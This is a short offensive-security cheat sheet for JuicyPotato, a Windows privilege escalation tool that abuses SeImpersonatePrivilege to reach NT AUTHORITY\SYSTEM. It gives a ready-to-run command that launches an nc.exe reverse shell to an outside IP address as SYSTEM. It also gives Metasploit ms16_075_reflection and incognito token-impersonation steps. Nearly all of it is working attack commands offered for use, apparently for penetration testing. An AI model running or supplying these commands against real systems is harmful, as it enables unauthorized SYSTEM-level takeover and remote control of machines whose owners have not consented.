JuicyPotato

Description

Windows privilege escalation tool that abuses SeImpersonatePrivilege via token impersonation. JuicyPotato exploits COM servers to escalate from a service account to NT AUTHORITY\SYSTEM. It requires a valid CLSID for the target Windows version. Use JuicyPotato as a fallback when PrintSpoofer and EfsPotato fail.

Usage 1: Execute a Reverse Shell as SYSTEM

Use JuicyPotato to launch a command (such as nc.exe reverse shell) as SYSTEM by specifying a listening port, a valid CLSID, the program to execute, and its arguments.

Command:

.\juicepotato.exe -l 1337 -c "{69AD4AEE-51BE-439b-A92C-86AE490E8B30}" -p c:\windows\system32\cmd.exe -a "/c c:\users\apache\desktop\nc.exe -e cmd.exe 192.168.45.187 443" -t *

---

Usage 2: Token Impersonation via Metasploit (Rotten Potato)

If you have a Meterpreter session and SeImpersonatePrivilege is enabled, use the Metasploit module for the Rotten Potato / token impersonation attack.

Command:

use windows/local/ms16_075_reflection

Then set required options and run. After getting a session, load incognito and impersonate a token:

Command:

load incognito

Command:

list_tokens -u

Command:

impersonate_token "PASTE_TOKEN_HERE"

---

Notes

• Requires SeImpersonatePrivilege to be enabled (check with whoami /priv).
• CLSID values differ per Windows version. Choose one from: https://ohpe.it/juicy-potato/CLSID/
• If a CLSID gives an error, try a different one.
• GitHub: https://github.com/ohpe/juicy-potato
• Reference for Rotten Potato: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/